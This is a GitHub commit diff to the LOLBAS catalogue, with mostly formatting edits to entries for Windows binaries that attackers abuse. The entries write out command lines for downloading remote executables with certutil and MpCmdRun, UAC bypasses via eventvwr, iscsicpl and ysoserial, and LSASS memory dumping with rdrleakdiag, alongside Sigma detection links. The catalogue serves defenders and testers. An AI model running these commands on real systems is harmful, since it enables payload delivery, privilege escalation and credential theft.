Skip to content

Commit 3ae5408

Browse files
1 parent 5f569f6 commit 3ae5408

File tree

12 files changed

+18
-28
lines changed

12 files changed

+18
-28
lines changed

_lolbas/Binaries/Bitsadmin.md

Lines changed: 0 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -35,8 +35,6 @@ Commands:
3535
Full_Path:
3636
- Path: C:\Windows\System32\bitsadmin.exe
3737
- Path: C:\Windows\SysWOW64\bitsadmin.exe
38-
Code_Sample:
39-
- Code:
4038
Detection:
4139
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_bitsadmin_download.yml
4240
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/web/proxy_generic/proxy_ua_bitsadmin_susp_tld.yml

_lolbas/Binaries/Certutil.md

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -12,7 +12,7 @@ Commands:
1212
MitreID: T1105
1313
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
1414
- Command: certutil.exe -verifyctl -f {REMOTEURL:.exe} {PATH:.exe}
15-
Description: Download and save an executable to disk in the current folder when a file path is specified, or %LOCALAPPDATA%low\Microsoft\CryptnetUrlCache\Content\[hash] when not.
15+
Description: Download and save an executable to disk in the current folder when a file path is specified, or `%LOCALAPPDATA%low\Microsoft\CryptnetUrlCache\Content\<hash>` when not.
1616
Usecase: Download file from Internet
1717
Category: Download
1818
Privileges: User
@@ -26,7 +26,7 @@ Commands:
2626
MitreID: T1564.004
2727
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
2828
- Command: certutil.exe -URL {REMOTEURL:.exe}
29-
Description: Download and save an executable to %LOCALAPPDATA%low\Microsoft\CryptnetUrlCache\Content\[hash].
29+
Description: Download and save an executable to `%LOCALAPPDATA%low\Microsoft\CryptnetUrlCache\Content\<hash>`.
3030
Usecase: Download file from Internet
3131
Category: Download
3232
Privileges: User

_lolbas/Binaries/Cmdkey.md

Lines changed: 0 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -19,7 +19,4 @@ Detection:
1919
Resources:
2020
- Link: https://web.archive.org/web/20230202122017/https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation
2121
- Link: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmdkey
22-
Acknowledgement:
23-
- Person:
24-
Handle:
2522
---

_lolbas/Binaries/Eudcedit.md

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -5,7 +5,7 @@ Author: Matan Bahar
55
Created: 2025-08-07
66
Commands:
77
- Command: eudcedit
8-
Description: Once executed, the Private Charecter Editor will be opened - click OK, then click File -> Font Links. In the next window choose the option "Link with Selected Fonts" and click on Save As, then in the opened enter the command you want to execute.
8+
Description: Once executed, the Private Charecter Editor will be opened - click OK, then click File -> Font Links. In the next window choose the option "Link with Selected Fonts" and click on Save As, then in the opened enter the command you want to execute.
99
Usecase: Execute a binary or script as a high-integrity process without a UAC prompt.
1010
Category: UAC Bypass
1111
Privileges: Administrator

_lolbas/Binaries/Eventvwr.md

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -5,7 +5,7 @@ Author: Jacob Gajek
55
Created: 2018-11-01
66
Commands:
77
- Command: eventvwr.exe
8-
Description: During startup, eventvwr.exe checks the registry value HKCU\Software\Classes\mscfile\shell\open\command for the location of mmc.exe, which is used to open the eventvwr.msc saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user.
8+
Description: During startup, eventvwr.exe checks the registry value `HKCU\Software\Classes\mscfile\shell\open\command` for the location of mmc.exe, which is used to open the eventvwr.msc saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user.
99
Usecase: Execute a binary or script as a high-integrity process without a UAC prompt.
1010
Category: UAC Bypass
1111
Privileges: User
@@ -15,7 +15,7 @@ Commands:
1515
- Application: GUI
1616
- Execute: EXE
1717
- Command: ysoserial.exe -o raw -f BinaryFormatter - g DataSet -c "{CMD}" > RecentViews & copy RecentViews %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews & eventvwr.exe
18-
Description: During startup, eventvwr.exe uses .NET deserialization with %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews file. This file can be created using https://github.com/pwntester/ysoserial.net
18+
Description: During startup, eventvwr.exe uses .NET deserialization with `%LOCALAPPDATA%\Microsoft\EventV~1\RecentViews` file. This file can be created using https://github.com/pwntester/ysoserial.net
1919
Usecase: Execute a command to bypass security restrictions that limit the use of command-line interpreters.
2020
Category: UAC Bypass
2121
Privileges: Administrator

_lolbas/Binaries/Iscsicpl.md

Lines changed: 4 additions & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -4,7 +4,7 @@ Description: Microsoft iSCSI Initiator Control Panel tool
44
Author: Ekitji
55
Created: 2025-08-17
66
Commands:
7-
- Command: c:\windows\syswow64\iscsicpl.exe # SysWOW64 binary
7+
- Command: c:\windows\syswow64\iscsicpl.exe # SysWOW64 binary
88
Description: c:\windows\syswow64\iscsicpl.exe has a DLL injection through `C:\Users\<username>\AppData\Local\Microsoft\WindowsApps\ISCSIEXE.dll`, resulting in UAC bypass.
99
Usecase: Execute a custom DLL via a trusted high-integrity process without a UAC prompt.
1010
Category: UAC Bypass
@@ -13,7 +13,7 @@ Commands:
1313
OperatingSystem: Windows 10, Windows 11
1414
Tags:
1515
- Execute: DLL
16-
- Command: iscsicpl.exe # SysWOW64/System32 binary
16+
- Command: iscsicpl.exe # SysWOW64/System32 binary
1717
Description: Both `c:\windows\system32\iscsicpl.exe` and `c:\windows\system64\iscsicpl.exe` have UAC bypass through launching iscicpl.exe, then navigating into the Configuration tab, clicking Report, then launching your custom command.
1818
Usecase: Execute a binary or script as a high-integrity process without a UAC prompt.
1919
Category: UAC Bypass
@@ -24,8 +24,8 @@ Commands:
2424
- Execute: CMD
2525
- Application: GUI
2626
Full_Path:
27-
- Path: c:\windows\system32\iscsicpl.exe # UAC Bypass by breaking out from application
28-
- Path: c:\windows\syswow64\iscsicpl.exe # UAC Bypass by DLL injection and breakout from application
27+
- Path: c:\windows\system32\iscsicpl.exe # UAC Bypass by breaking out from application
28+
- Path: c:\windows\syswow64\iscsicpl.exe # UAC Bypass by DLL injection and breakout from application
2929
Detection:
3030
- Sigma: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/image_load/image_load_uac_bypass_iscsicpl.yml
3131
- IOC: C:\Users\<username>\AppData\Local\Microsoft\WindowsApps\ISCSIEXE.dll

_lolbas/Binaries/Ldifde.md

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -5,7 +5,7 @@ Author: Grzegorz Tworek
55
Created: 2022-08-31
66
Commands:
77
- Command: Ldifde -i -f {PATH:.ldf}
8-
Description: Import specified .ldf file into LDAP. If the file contains http-based attrval-spec such as thumbnailPhoto:< http://example.org/somefile.txt, the file will be downloaded into IE temp folder.
8+
Description: Import specified .ldf file into LDAP. If the file contains http-based attrval-spec such as `thumbnailPhoto:< http://example.org/somefile.txt`, the file will be downloaded into IE temp folder.
99
Usecase: Download file from Internet
1010
Category: Download
1111
Privileges: Administrator

_lolbas/Binaries/MpCmdRun.md

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -12,7 +12,7 @@ Commands:
1212
MitreID: T1105
1313
OperatingSystem: Windows 10
1414
- Command: copy "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" C:\Users\Public\Downloads\MP.exe && chdir "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\" && "C:\Users\Public\Downloads\MP.exe" -DownloadFile -url {REMOTEURL:.exe} -path C:\Users\Public\Downloads\evil.exe
15-
Description: Download file to specified path - Slashes work as well as dashes (/DownloadFile, /url, /path) [updated version to bypass Windows 10 mitigation]
15+
Description: Download file to specified path. Slashes work as well as dashes (/DownloadFile, /url, /path). Updated version to bypass Windows 10 mitigation.
1616
Usecase: Download file
1717
Category: Download
1818
Privileges: User

_lolbas/Binaries/OneDriveStandaloneUpdater.md

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -5,7 +5,7 @@ Author: 'Elliot Killick'
55
Created: 2021-08-22
66
Commands:
77
- Command: OneDriveStandaloneUpdater
8-
Description: Download a file from the web address specified in HKCU\Software\Microsoft\OneDrive\UpdateOfficeConfig\UpdateRingSettingURLFromOC. ODSUUpdateXMLUrlFromOC and UpdateXMLUrlFromOC must be equal to non-empty string values in that same registry key. UpdateOfficeConfigTimestamp is a UNIX epoch time which must be set to a large QWORD such as 99999999999 (in decimal) to indicate the URL cache is good. The downloaded file will be in %localappdata%\OneDrive\StandaloneUpdater\PreSignInSettingsConfig.json
8+
Description: Download a file from the web address specified in `HKCU\Software\Microsoft\OneDrive\UpdateOfficeConfig\UpdateRingSettingURLFromOC`. `ODSUUpdateXMLUrlFromOC` and `UpdateXMLUrlFromOC` must be equal to non-empty string values in that same registry key. `UpdateOfficeConfigTimestamp` is a UNIX epoch time which must be set to a large QWORD such as 99999999999 (in decimal) to indicate the URL cache is good. The downloaded file will be in `%localappdata%\OneDrive\StandaloneUpdater\PreSignInSettingsConfig.json`.
99
Usecase: Download a file from the Internet without executing any anomalous executables with suspicious arguments
1010
Category: Download
1111
Privileges: User

_lolbas/Binaries/Rdrleakdiag.md

Lines changed: 3 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -5,21 +5,21 @@ Author: 'John Dwyer'
55
Created: 2022-05-18
66
Commands:
77
- Command: rdrleakdiag.exe /p 940 /o {PATH_ABSOLUTE:folder} /fullmemdmp /wait 1
8-
Description: Dump process by PID and create a dump file (Creates files called minidump_<PID>.dmp and results_<PID>.hlk).
8+
Description: Dump process by PID and create a dump file (creates files called `minidump_<PID>.dmp` and `results_<PID>.hlk`).
99
Usecase: Dump process by PID.
1010
Category: Dump
1111
Privileges: User
1212
MitreID: T1003
1313
OperatingSystem: Windows
1414
- Command: rdrleakdiag.exe /p 832 /o {PATH_ABSOLUTE:folder} /fullmemdmp /wait 1
15-
Description: Dump LSASS process by PID and create a dump file (Creates files called minidump_<PID>.dmp and results_<PID>.hlk).
15+
Description: Dump LSASS process by PID and create a dump file (creates files called `minidump_<PID>.dmp` and `results_<PID>.hlk`).
1616
Usecase: Dump LSASS process.
1717
Category: Dump
1818
Privileges: Administrator
1919
MitreID: T1003.001
2020
OperatingSystem: Windows
2121
- Command: rdrleakdiag.exe /p 832 /o {PATH_ABSOLUTE:folder} /fullmemdmp /snap
22-
Description: After dumping a process using /wait 1, subsequent dumps must use /snap (Creates files called minidump_<PID>.dmp and results_<PID>.hlk).
22+
Description: After dumping a process using `/wait 1`, subsequent dumps must use `/snap` (creates files called `minidump_<PID>.dmp` and `results_<PID>.hlk`).
2323
Usecase: Dump LSASS process mutliple times.
2424
Category: Dump
2525
Privileges: Administrator

0 commit comments

Comments
 (0)